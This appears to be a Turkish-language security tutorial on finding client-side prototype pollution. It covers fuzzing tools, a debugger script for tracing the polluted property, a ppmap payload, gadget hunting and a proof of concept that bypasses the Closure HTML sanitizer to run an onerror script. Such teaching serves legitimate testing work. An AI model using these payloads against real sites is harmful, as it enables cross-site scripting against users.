Client Side Prototype Pollution

Otomatik araçlar kullanarak keşfetme

Araçlar https://github.com/dwisiswant0/ppfuzz, https://github.com/kleiton0x00/ppmap ve https://github.com/kosmosec/proto-find prototip kirlenmesi açıklarını bulmak için kullanılabilir.

Ayrıca, prototip kirlenmesi açıkları için eriştiğiniz sayfaları otomatik olarak taramak amacıyla PPScan tarayıcı uzantısını da kullanabilirsiniz.

Bir özelliğin nerede kullanıldığını hata ayıklama

// Stop debugger where 'potentialGadget' property is accessed
Object.defineProperty(Object.prototype,'potentialGadget', {__proto__:null, get(){
console.trace();
return 'test';
}})

Prototype Pollution'ın Temel Sebebini Bulma

Bir prototype pollution açığı herhangi bir araç tarafından belirlendikten sonra ve eğer kod aşırı karmaşık değilse, Chrome Geliştirici Araçları'nda location.hash, decodeURIComponent veya location.search gibi anahtar kelimeleri arayarak açığı bulabilirsiniz. Bu yaklaşım, JavaScript kodunun savunmasız bölümünü belirlemenizi sağlar.

Daha büyük ve karmaşık kod tabanları için, savunmasız kodu keşfetmenin basit bir yöntemi aşağıdaki adımları içerir:

1. Bir aracı kullanarak bir açığı belirleyin ve bir özelliği kurucuda ayarlamak için tasarlanmış bir yük elde edin. ppmap tarafından sağlanan bir örnek şöyle görünebilir: constructor[prototype][ppmap]=reserved.

2. Sayfada çalışacak ilk JavaScript kodunun satırında bir kesme noktası ayarlayın. Yük ile sayfayı yenileyin ve bu kesme noktasında yürütmeyi durdurun.

3. JavaScript yürütmesi duraklatıldığında, JS konsolunda aşağıdaki betiği çalıştırın. Bu betik, 'ppmap' özelliği oluşturulduğunda sinyal verecek ve kökenini bulmanıza yardımcı olacaktır:

function debugAccess(obj, prop, debugGet=true){

var origValue = obj[prop];

Object.defineProperty(obj, prop, {
get: function () {
if (debugGet)
debugger;
return origValue;
},
set: function(val) {
debugger;
origValue = val;
}
});

};

debugAccess(Object.prototype, 'ppmap')

4. Sources sekmesine geri dönün ve “Script yürütmesini devam ettir” seçeneğini seçin. JavaScript çalışmaya devam edecek ve 'ppmap' özelliği beklendiği gibi kirletilecektir. Sağlanan kod parçasını kullanarak 'ppmap' özelliğinin kirletildiği tam yeri belirlemek mümkündür. Call Stack'i inceleyerek, kirlenmenin gerçekleştiği farklı yığınlar gözlemlenebilir.

Hangi yığını inceleyeceğinize karar verirken, genellikle JavaScript kütüphane dosyalarıyla ilişkili yığınları hedeflemek faydalıdır, çünkü prototip kirlenmesi genellikle bu kütüphaneler içinde meydana gelir. Kütüphane dosyalarına (sağ tarafta, rehberlik için sağlanan bir resme benzer şekilde görülebilir) bağlılığını inceleyerek ilgili yığını belirleyin. 4 ve 6. satırlardaki gibi birden fazla yığın olduğunda, mantıklı seçim 4. satırdaki yüktür, çünkü bu, kirlenmenin ilk gerçekleştiği yeri temsil eder ve dolayısıyla zafiyetin kök nedenidir. Yığına tıklamak sizi zayıf koda yönlendirecektir.

Script Gadget'larını Bulma

Gadget, bir PP zafiyeti keşfedildiğinde kötüye kullanılacak koddur.

Uygulama basitse, srcdoc/innerHTML/iframe/createElement gibi anahtar kelimeleri arama yapabiliriz ve kaynak kodunu gözden geçirip bunun javascript yürütmesine yol açıp açmadığını kontrol edebiliriz. Bazen, bahsedilen teknikler hiç gadget bulamayabilir. Bu durumda, saf kaynak kodu incelemesi aşağıdaki örnekte olduğu gibi bazı güzel gadget'lar ortaya çıkarır.

Mithil kütüphanesi kodunda PP gadget bulma örneği

Bu yazıyı kontrol edin: https://blog.huli.tw/2022/05/02/en/intigriti-revenge-challenge-author-writeup/

Zayıf kütüphaneler için yüklerin yeniden derlenmesi

• https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#prototype-pollution

• https://github.com/BlackFan/client-side-prototype-pollution

PP aracılığıyla HTML Sanitizer'ları atlatma

Bu araştırma bazı HTML sanitizers kütüphaneleri tarafından sağlanan sanitizasyonları atlatmak için kullanılacak PP gadget'larını göstermektedir:

• sanitize-html

• dompurify

• Closure

<!-- from https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/ -->
<script>
Object.prototype['* ONERROR'] = 1;
Object.prototype['* SRC'] = 1;
</script>
<script src=https://google.github.io/closure-library/source/closure/goog/base.js></script>
<script>
goog.require('goog.html.sanitizer.HtmlSanitizer');
goog.require('goog.dom');
</script>
<body>
<script>
const html = '<img src onerror=alert(1)>';
const sanitizer = new goog.html.sanitizer.HtmlSanitizer();
const sanitized = sanitizer.sanitize(html);
const node = goog.dom.safeHtmlToNode(sanitized);

document.body.append(node);
</script>

Referanslar

• https://infosecwriteups.com/hunting-for-prototype-pollution-and-its-vulnerable-code-on-js-libraries-5bab2d6dc746

• https://blog.s1r1us.ninja/research/PP

• https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/#:~:text=my%20challenge.-,Closure,-Closure%20Sanitizer%20has